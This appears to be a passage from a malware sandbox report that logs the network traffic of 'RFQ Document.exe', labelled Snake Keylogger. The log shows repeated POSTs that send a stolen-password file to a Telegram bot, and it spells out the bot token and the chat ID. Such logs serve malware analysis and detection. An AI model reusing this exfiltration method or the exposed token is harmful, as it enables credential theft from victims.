                                            Data Ascii: --------------------------8d98255ef716bedContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:37 UTC385INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:37 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:37 UTC386INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12829,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            243192.168.2.450065149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:37 UTC386OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ef89435d
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:37 UTC386OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 38 39 34 33 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ef89435dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:37 UTC387INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:37 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:37 UTC387INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12830,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            244192.168.2.450066149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:37 UTC388OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ef9eb898
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:37 UTC388OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 39 65 62 38 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ef9eb898Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:37 UTC388INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:37 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:37 UTC389INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12831,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            245192.168.2.450067149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:37 UTC389OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255efc4de56
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:37 UTC390OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 63 34 64 65 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255efc4de56Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:37 UTC390INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:37 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:37 UTC390INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12833,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            246192.168.2.450068149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:37 UTC391OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255efdcb580
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:37 UTC391OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 64 63 62 35 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255efdcb580Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:38 UTC392INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:38 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:38 UTC392INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12834,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            247192.168.2.450070149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:38 UTC393OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255effbb41a
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:38 UTC393OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 66 66 62 62 34 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255effbb41aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:38 UTC393INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:38 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:38 UTC394INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12835,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808778,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            248192.168.2.450072149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:38 UTC394OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f018515d
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:38 UTC394OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 31 38 35 31 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f018515dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:38 UTC395INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:38 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:38 UTC395INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12836,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808778,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            249192.168.2.450073149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:38 UTC396OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f03027e0
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:38 UTC396OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 30 33 30 32 37 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f03027e0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:38 UTC396INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:38 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
